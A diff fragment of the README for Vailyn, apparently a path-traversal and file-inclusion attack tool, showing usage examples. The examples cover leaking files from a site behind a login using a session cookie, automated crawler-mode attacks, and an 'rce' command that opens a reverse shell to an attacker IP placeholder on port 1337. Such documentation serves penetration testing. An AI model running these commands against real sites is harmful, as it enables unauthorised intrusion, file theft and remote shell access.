VainlyStrain/Vailyn/README.md

 will infect DATA2 with the payload

 * Attack, but target is behind login screen:
-`$ Vailyn -v "http://site.com/" -a 1 -p2 leak dicts/files dicts/dirs -c cookie.txt`
+`$ Vailyn -v "http://site.com/" -a 1 -p2 leak dicts/files dicts/dirs -c "sessionid=foobar"`

 * Attack, but I want a reverse shell on port 1337:
 `$ Vailyn -v "http://site.com/download.php" -a 1 -p2 rce MY.IP.IS.XX 1337  # a high Phase 2 Depth would be beneficial`
 (will start a ncat listener for you if on Unix)

 * Full automation in crawler mode:
-`$ Vailyn -v "http://root-url.site" -a 5` _you can also specify other args, like depths, lfi & lookup file here_
+`$ Vailyn -v "http://root-url.site" -a 5` _you can also specify other args, like cookie, depths, lfi & lookup file here_

 * Full automation, but Arjun needs `--stable`:
 `$ Vailyn -v "http://root-url.site" -a 5 -s ANY`